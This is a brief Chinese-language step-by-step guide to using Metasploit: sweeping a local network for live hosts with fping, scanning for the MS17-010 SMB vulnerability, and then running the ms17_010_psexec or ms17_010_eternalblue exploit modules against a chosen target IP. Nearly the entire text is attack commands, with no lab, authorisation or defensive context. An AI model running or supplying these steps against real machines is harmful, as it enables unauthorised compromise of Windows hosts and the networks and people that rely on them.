打开MSF
msfconsole
fping -a -g 起始IP 结束IP (扫描当前局域网活跃IP)
fping -a -g 192.168.1.1 192.168.1.250
先输入这条命令
gem install ruby_smb
然后,扫描内网有没有MS17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010
结果会扫描出来内网存在MS17-010漏洞的内网IP
set RHOSTS <存在漏洞的IP>
run
看到绿色的就代表扫描出来的漏洞。
然后输入这条命令,启用这个模板
use exploit/windows/smb/ms17_010_psexec(2003 xp 2012)
use exploit/windows/smb/ms17_010_eternalblue (08 w7)
设置要扫描的IP
set RHOST 192.168.0.101
exploit
OK